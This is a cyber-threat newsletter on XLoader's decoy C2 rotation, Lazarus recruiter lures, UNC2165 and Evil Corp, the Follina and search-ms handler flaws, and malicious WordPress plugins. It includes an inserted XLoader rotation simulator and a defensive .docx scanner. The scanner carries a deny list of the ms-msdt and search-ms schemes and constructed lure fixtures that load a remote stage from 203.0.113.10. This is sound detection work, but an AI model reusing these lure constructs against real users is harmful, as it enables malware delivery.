Ankura CTIX FLASH Update - June 3, 2022

Ransomware/Malware Activity

Newest XLoader Versions Use Probability Theory to Hide Their C2 Server Domains Amongst Sixty-Three Decoys

The newest versions of the evolving "XLoader" botnet have been observed using probability theory to obscure their command-and-control (C2) infrastructure from analysts and to lower the risk of losing C2 nodes to tracking, identification, and blocking. XLoader, an information-stealing botnet first observed in January 2021, is the successor of the "Formbook" malware; unlike Formbook, which was Windows-only, XLoader targets both Windows and macOS systems. Check Point researchers analyzed XLoader and determined that its developers have found a way to mask the true C2 infrastructure among a series of decoys. Check Point previously detailed how XLoader 2.3 began concealing its C2 server by listing sixty-three (63) decoy domains alongside the real C2 domain in its configuration, a pool of sixty-four (64) domains from which the malware randomly selects sixteen (16) for C2 communication. XLoader 2.5 goes further: after each attempt to contact the sixteen selected domains, it overwrites the first eight (8) entries of the list with new random picks from the sixty-four-domain pool, so the real C2 domain can appear anywhere in the list. Researchers explained that "if the real C&C domain is in the second part of the list, it is accessed in every cycle once in approximately every 80-90 seconds. If it appears in the first part of the list, it will be overwritten in the next cycle with another random domain name." If the real C2 domain is among the first eight (8) domains in the list, "the probability that a real C&C server will be accessed in the next cycle is 7/64 or 1/8," depending on the position of the specific fake C2 servers. This scheme forces analysts to perform "a lengthy emulation to derive the actual C2 address, which is an atypical practice and renders all automated scripts useless," achieving two (2) goals: disguising the real C2 server from common sandbox emulations and maintaining the effectiveness of the malware.
It is important to note that "it would be unlikely for XLoader not to contact the genuine C2 address after an hour after infection." The newest version, XLoader 2.6, has one (1) functional change: on x64 systems the real C2 domain is "now accessed in every communication cycle, or once in approximately 80-90 seconds." On 32-bit (x86) systems, which many sandboxes still use for their virtual machines, the real C2 domain has the same probability of being contacted as any decoy domain. A list of indicators of compromise (IOCs) and screenshots of the process described above can be viewed in Check Point's report linked below.
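The rotation scheme described above is easy to reason about once it is written down as a model. The following Python script is an added example (not Check Point's code or anything from the CTIX update) that simulates the 64-domain pool, the 16-domain active list, the overwrite of the first eight slots after each cycle, and the 2.6 behaviour of always reaching the real C2 on x64. It then estimates how often a sandbox that runs for a given number of minutes would observe the real C2 at all. Domain names, the 85-second cycle length and the replacement picks being drawn with replacement are assumptions of the model (the report's "7/64 or 1/8" figure suggests the real malware avoids some duplicates), so treat the percentages as approximations of the mechanism rather than measurements of XLoader itself.

```python
"""Toy model of XLoader 2.5/2.6 decoy-domain rotation (added example, not Check Point's code)."""
import random

POOL_SIZE = 64        # 63 decoys plus the real C2 in the configuration
ACTIVE_SIZE = 16      # domains chosen for a communication cycle
OVERWRITE = 8         # leading slots rewritten after every cycle (2.5+)
CYCLE_SECONDS = 85    # one cycle roughly every 80-90 s per the report (assumed midpoint)
REAL_C2 = "real-c2.example"   # constructed placeholder name


def build_pool(rng):
    """Constructed 64-entry config: 63 decoy names and the real C2, shuffled."""
    pool = [f"decoy-{i:02d}.example" for i in range(POOL_SIZE - 1)] + [REAL_C2]
    rng.shuffle(pool)
    return pool


def rotate(active, pool, rng):
    """Replace the first 8 active entries with fresh random picks (drawn with
    replacement, a simplification); entries 9-16 survive, so a real C2 sitting
    there is contacted every cycle thereafter."""
    return [rng.choice(pool) for _ in range(OVERWRITE)] + active[OVERWRITE:]


def contacted_this_cycle(active, version="2.5", x64=False):
    """2.6 on x64 reaches the real C2 every cycle; otherwise it must be in the list."""
    if version == "2.6" and x64:
        return True
    return REAL_C2 in active


def first_contact_cycle(rng, version="2.5", x64=False, max_cycles=100_000):
    """Cycle number (1-based) at which the real C2 is first contacted, or None."""
    pool = build_pool(rng)
    active = rng.sample(pool, ACTIVE_SIZE)
    for cycle in range(1, max_cycles + 1):
        if contacted_this_cycle(active, version, x64):
            return cycle
        active = rotate(active, pool, rng)
    return None


def sandbox_hit_rate(seconds, trials=2000, seed=0, **kw):
    """Monte Carlo estimate of the fraction of infections whose real C2 a sandbox
    that runs for `seconds` would observe (cycles = seconds // CYCLE_SECONDS)."""
    rng = random.Random(seed)
    budget = max(1, seconds // CYCLE_SECONDS)
    hits = 0
    for _ in range(trials):
        first = first_contact_cycle(rng, **kw)
        if first is not None and first <= budget:
            hits += 1
    return hits / trials


if __name__ == "__main__":
    print(f"2.5, 5-minute sandbox:   {sandbox_hit_rate(5 * 60):.1%} of runs reach the real C2")
    print(f"2.5, 60-minute sandbox:  {sandbox_hit_rate(60 * 60):.1%}")
    print(f"2.6 on x64, 5 minutes:   {sandbox_hit_rate(5 * 60, version='2.6', x64=True):.1%}")
```

The numbers fall out directly from the mechanism: on the first cycle the real C2 is in the active list with probability 16/64, and on every later cycle the eight fresh picks bring it in with probability close to 1/8, so a few-minute sandbox run sees the real server less than half the time while an hour-long run almost always does, which is exactly why the report stresses lengthy emulation and why many automated sandboxes end up with only decoys.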

Threat Actor Activity

Lazarus Espionage Campaign Targeting LinkedIn/WhatsApp Users

Since late 2021, threat actors from the Lazarus Group have been using carefully backstopped fake personas to target defense contractors in Europe and the Middle East. The primary aim of the campaign appears to be cyber espionage, though the actors also made unsuccessful attempts to profit financially. Posing as job recruiters on social platforms such as LinkedIn and WhatsApp, the actors delivered malware-laced job description documents to their targets. The original 2020 campaign victimized users in Brazil, the Czech Republic, Ukraine, Turkey, and Qatar; the most recent campaign targets users in France, Italy, Spain, the Netherlands, and Poland. The actors frequently piggybacked on legitimate recruitment services to mask their approach and build trust with the target. While the specific malware families were not disclosed, the malware likely exfiltrated information about the victim, from system information to personally identifiable information (PII). CTIX analysts urge users never to open attachments or hyperlinks sent by unknown or unsolicited contacts, in order to lessen the risk of compromise.

UNC2165 Connections to Evil Corp Cybercriminal Organization

Security researchers at Mandiant have uncovered high-confidence connections between the threat group UNC2165 and the notorious cybercriminal organization Evil Corp. In an attempt to evade United States sanctions, Evil Corp has shifted to using Ransomware-as-a-Service (RaaS) offerings rather than its own branded ransomware. Analysis of recent UNC2165 attacks shows significant overlap in indicators of compromise (IOCs) between UNC2165 and Evil Corp, including shared command-and-control (C2) infrastructure and similar code structures within malicious payloads. Analysis of previous UNC2165 tactics, techniques, and procedures (TTPs) shows that the group favors gaining initial access through infections distributed by another financially motivated threat group, UNC1543: the "FAKEUPDATES" (also known as SocGholish) payload is deployed on the target system as the initial foothold, followed by "DRIDEX", ultimately leading to "BITPAYMER" or "DOPPELPAYMER" ransomware infections. Evil Corp has deployed these same payloads in the past, which allowed analysts to compare IOCs and trace the connections between the two groups. Evil Corp has also been linked to other ransomware operations, including "PHOENIXLOCKER" and the activity cluster Secureworks tracks as "GOLD WINTER" (the operators of the Hades ransomware); these attacks only strengthen the link between Evil Corp and UNC2165. CTIX analysts will continue to monitor threat actor activity worldwide and provide updates as needed.


0patch Unofficially Patches Zero-Day MSDT URI Protocol Handler Vulnerability but Researchers Quickly Uncover Another URI Protocol Flaw

UPDATE to 5/31/2022 FLASH UPDATE: The 0patch micropatching service released an unofficial patch that mitigates the critical zero-day vulnerability known as "Follina" (tracked as CVE-2022-30190), which allows threat actors to weaponize Word documents so that remotely hosted malicious PowerShell is executed locally, yielding arbitrary code execution (ACE) with the privileges of the calling application. The flaw is in the URI protocol handler for the Microsoft Windows Support Diagnostic Tool (MSDT); if exploited, it could allow attackers to install programs and conduct a host of other malicious activity with no interaction beyond the victim opening or previewing the document. In a Twitter post, 0patch explained that its patch does not disable the MSDT URI protocol handler (as Microsoft's manual mitigation does) but instead adds the sanitization of the user-provided path that the handler is missing. Unfortunately, this class of URI protocol handler flaw is not exclusive to MSDT. Shortly after the unofficial patch was released, security researcher and Hacker House co-founder Matthew Hickey tweeted a new proof-of-concept (PoC) exploit that adapted the existing MSDT technique to another zero-day flaw in the Windows Search URI protocol handler, "search-ms". Windows Search is integrated into every Explorer window and "enables users to quickly search for files and items by file name, properties, and full-text contents." The search-ms URI protocol handler, much like the MSDT handler, can be pointed at remote hosts, which allowed Hickey to combine the Microsoft Office OLEObject weakness with the search-ms handler to open a remote search window simply by opening a Word document. Successful exploitation would allow threat actors to present victims with a search window populated by attacker-hosted files and socially engineer them into launching malware locally.
These fundamental weaknesses resemble the infamous Windows "PrintNightmare" Print Spooler flaws: Microsoft patched the individual privilege escalation and command execution bugs, but threat actors quickly found new ones because the underlying weakness in the Print Spooler itself remained. Microsoft will likely need to take steps to prevent URI protocol handlers from being launched from Office documents without any user interaction. For the time being, administrators can mitigate the search-ms flaw the same way Microsoft recommends mitigating the MSDT vulnerability: export the protocol handler's registry key as a backup (HKEY_CLASSES_ROOT\search-ms, or HKEY_CLASSES_ROOT\ms-msdt for Follina) and then delete it, which removes the handler until the key is restored. To obtain the free micropatch for the MSDT vulnerability, administrators should register a 0patch account and install the 0patch Agent, which applies the patch automatically. The CTIX team will closely monitor exploitation of these flaws, and updates may be released in future FLASH Updates.
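Both lures described above share a structure that a defender can check for without opening the document: a .docx is a zip of XML parts, and the relationship (.rels) parts declare what Word loads when the file opens. The Python script below is an added example (not from the CTIX update, 0patch, or Hickey's PoC) that flags the two patterns the text describes: an OLE object relationship with TargetMode="External", which makes Word fetch a remote stage on open, and any relationship target or document part that invokes the ms-msdt: or search-ms: URI schemes. The scheme deny list, the relationship types treated as remote loaders, and the sample documents (including the 203.0.113.10 documentation address) are constructed assumptions of this example, not indicators taken from real samples.

```python
"""Scan .docx files for Follina-style lure indicators (added example, not page code)."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Protocol handlers discussed in the text; the list itself is an assumption of this
# example and should be extended to whatever handlers local policy treats as risky.
DANGEROUS_SCHEMES = ("ms-msdt", "search-ms")
SCHEME_RE = re.compile(rb"(?i)\b(ms-msdt|search-ms):")

# Relationship types that make Word fetch and load the target on open.  With
# TargetMode="External" this is how Follina documents pull the remote HTML stage.
REMOTE_LOAD_TYPES = ("/oleObject", "/attachedTemplate", "/frame")
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def scan_rels(xml_bytes, part_name):
    """Return (part, rel_id, kind, target) findings for one .rels part."""
    findings = []
    for rel in ET.fromstring(xml_bytes).iter(REL_NS + "Relationship"):
        target = rel.get("Target", "")
        scheme = target.split(":", 1)[0].lower() if ":" in target else ""
        external = rel.get("TargetMode", "Internal").lower() == "external"
        if scheme in DANGEROUS_SCHEMES:
            findings.append((part_name, rel.get("Id"), "dangerous-uri-scheme", target))
        elif external and rel.get("Type", "").endswith(REMOTE_LOAD_TYPES):
            findings.append((part_name, rel.get("Id"), "remote-load-external", target))
    return findings


def scan_docx(data):
    """Scan every .rels part, and grep every other XML part (field codes etc.)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.endswith(".rels"):
                findings.extend(scan_rels(zf.read(name), name))
            elif name.endswith(".xml"):
                for m in SCHEME_RE.finditer(zf.read(name)):
                    findings.append((name, None, "dangerous-uri-in-part", m.group(1).decode()))
    return findings


def build_sample_docx(rels_xml, document_xml="<w:document/>"):
    """Build a minimal .docx-shaped zip in memory (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", document_xml)
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


RELS_HEAD = ('<?xml version="1.0" encoding="UTF-8"?>'
             '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">')
RT = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Constructed benign document: an internal styles part plus an ordinary external hyperlink.
BENIGN_RELS = RELS_HEAD + (
    f'<Relationship Id="rId1" Type="{RT}styles" Target="styles.xml"/>'
    f'<Relationship Id="rId2" Type="{RT}hyperlink" Target="https://example.com/" TargetMode="External"/>'
    '</Relationships>')

# Constructed lure: a remote OLE object (the Follina stage loader) and a direct search-ms target.
LURE_RELS = RELS_HEAD + (
    f'<Relationship Id="rId1" Type="{RT}oleObject" Target="http://203.0.113.10/lure.html!" TargetMode="External"/>'
    f'<Relationship Id="rId2" Type="{RT}hyperlink" Target="search-ms:query=update&amp;crumb=location:\\\\203.0.113.10\\share" TargetMode="External"/>'
    '</Relationships>')


def scan_samples():
    """Run the scanner over the constructed samples; returns {label: sorted finding kinds}."""
    field_code_doc = ('<w:document><w:instrText>HYPERLINK "ms-msdt:/id PCWDiagnostic"'
                      '</w:instrText></w:document>')
    return {
        "benign": sorted(f[2] for f in scan_docx(build_sample_docx(BENIGN_RELS))),
        "lure": sorted(f[2] for f in scan_docx(build_sample_docx(LURE_RELS))),
        "field-code": sorted(f[2] for f in scan_docx(build_sample_docx(BENIGN_RELS, field_code_doc))),
    }


if __name__ == "__main__":
    for label, kinds in scan_samples().items():
        print(f"{label:<10} {kinds or 'clean'}")
```

An ordinary external hyperlink is not flagged, because the point is not that documents reference the internet but that Word itself will fetch and render an oleObject or template target on open; that distinction keeps the check usable at a mail gateway without drowning in false positives. The scanner cannot see an ms-msdt: or search-ms: redirect that lives only in the remote HTML stage, which is why the remote-load relationship is reported on its own.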

Honorable Mention

Researchers Discover Forty-Seven Thousand Malicious Plugins Using New Scanning Tool

Researchers from the Georgia Institute of Technology developed an automated framework called "YODA" to detect malicious WordPress plugins and identify their origins. WordPress is a content management system (CMS) written in PHP that allows webmasters to create and manage a website without programming it themselves. The platform lets webmasters install plugins that add features or alter content programmatically. Plugins are often hosted on marketplaces, where developers can charge for their use. While the marketplaces are full of useful plugins, threat actors also upload malicious plugins, either trojanized copies of popular plugins or lookalikes disguised as them. This lets the attacker run their own code on the web server to implant webshells, mine cryptocurrency in visitors' browsers, and even steal credentials or skim credit card data. Because WordPress sites are exposed on the internet, they are reachable by search engines and by scans that can detect the malicious plugins. The researchers ran YODA against over 410,000 unique web servers, with data dating back to 2012, and found 47,337 malicious plugins on 24,931 unique websites; plugins worth an estimated $834,000 were infected after deployment. The researchers also integrated YODA with the CMS so that webmasters can download it and scan their own websites for malicious plugins. CTIX analysts recommend that individuals and organizations managing WordPress instances scan them with YODA to detect malicious plugins and prevent their spread.

The Ankura semi-weekly Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence pertaining to current or emerging cyber events. The following is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high-level intelligence pertaining to recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to Flash ( if additional context is needed.

© Copyright 2022. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.
